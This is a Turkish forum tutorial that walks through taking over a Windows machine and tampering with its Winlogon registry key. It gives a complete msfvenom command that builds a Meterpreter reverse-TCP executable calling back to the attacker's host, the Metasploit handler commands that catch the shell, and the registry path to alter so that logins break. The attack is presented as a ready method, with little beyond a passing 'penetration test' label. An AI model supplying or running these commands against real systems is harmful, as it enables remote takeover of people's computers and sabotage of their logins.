Windows İşletim Sistemlerinde WinLogon Kontrolünün Exploit Edilerek İstismar Edilmesi

PwnLab.Me

Admin
Katılım
21 Ocak 2024
Mesajlar
202
Tepkime puanı
9
Puanları
18

Kaan Kozan tarafından 12 Ocak 2021 tarihinde yazılmıştır.​



Merhabalar, bugün sizlere Windows işletim sistemlerinde Windows Logon'un çalıştırılmasını sağlayan Oturum Açma ile birçok kritik kontrolü gerçekleştiren WinLogon bileşeninin istismar edilmesini anlatacağım.



Yazıda Geçen İçerik Tablosu



  • WinLogon'un Sistemlerde Kullanılmasındaki Etkenler
  • İşletim Sistemlerinde Ağ Bileşenlerinin Kimliklerinin Belirlenmesi
  • Reverse_TCP Dosyasının Oluşturularak Kullanılması
  • Hedef Sistem Üzerinde Sızma Testleri
  • Sızma Sonrası WinLogon Üzerinde Yapılabilecekler


WinLogon'un Sistemlerde Kullanılmasındaki Etkenler



Windows işletim sistemlerinde Default Registry Key değerlerinden biri olan, oturum açma aşamasında kimlik doğrulama görevi gören WinLogon bileşeni HKEY_LOCAL_MACHINE içerisinde yer alan bir değerdir.

1705942548701.png



İşletim Sistemlerinde Ağ Bileşenlerinin Kimliklerinin Belirlenmesi



Yazıda kullanacağımız Linux ve Windows işletim sistemlerinin İP Adresleri, Local Değerleri gibi bileşenler exploit aşamasında kullanılmak üzere öğrenilmelidir.

Bunun için Linux sistem üzerinde;

  • ifconfig
1705942558724.png


Windows sistem üzerinde ise;

  • ipconfig
1705942572430.png


Değerleri terminale yazıldığında aşağıdaki Local değerleri keşfedebiliyoruz.

Linux için; 192.168.1.39 (40)

Windows için; 192.168.1.38




Reverse_TCP Dosyasının Oluşturularak Kullanılması



Ağ keşfinin ardından artık msfvenom kullanılarak Reverse_TCP dosyasının oluşturulmasına geçilebilir. Ben sızma işlemi için msfvenom kullanacağım. Siz kendiniz de farklı yöntemler ile exploit edebilirsiniz.

İlk olarak msfvenom yazarak aracın sistem üzerinde arayüzüne erişebiliriz.

1705942581988.png



Daha sonrasında kullanacağımız payload'ı seçebiliriz. Burada windows/meterpreter/reverse_tcp payload'ını kullanabiliriz.

Ben örnek amacıyla resimlerde php versiyonları kullandım. Fakat siz Windows Payloadlar'ı kullanmalısınız.

1705942605242.png



Bunun ardından elde ettiğimiz ağ bilgileri ile aşağıdaki komut betiği yardımıyla bir dosya oluşturabiliriz.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.39 lport=4444 -f exe > / root/Desktop/reverse_tcp.exe

1705942612935.png


Bu aşamadan sonra hedef makinede exploit işlemi için oluşturulan dosyanın çalıştırılması gereklidir. Oluşturduğumuz dosya görseldeki şekildedir.

1705942620204.png


Hedef Sistem Üzerinde Sızma Testleri



Artık Metasploitable aracı açılarak exploit işlemlerine başlanılabilir. Bunun için ilk olarak msfconsole aracına erişimimizden sonra ''use exploit/multi/handler'' komutu kullanılabilir.

1705942628907.png


Ardından Local Host, Local Port gibi değerler belirlenerek hedef makine exploit edilebilir.

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.40
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit


1705942635613.png


Son işlem olarak, açılan sessions'a bağlanarak upload ve shell işlemleri ile değerlerde oynama yapılabilir.

1705942641916.png


Evet, ardından aşağıdaki gibi WinLogon'a erişilerek hedef sistemde Registry Key'lerde oturum aşma işlemlerinde değişiklikler yapılabilir, oturum açma işlemleri sekteye uğratılabilir.

Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

1705942649397.png


Anlatacaklarım buraya kadardı, okuduğunuz için teşekkürler. Esenlikler diliyorum.
 
Geri
Üst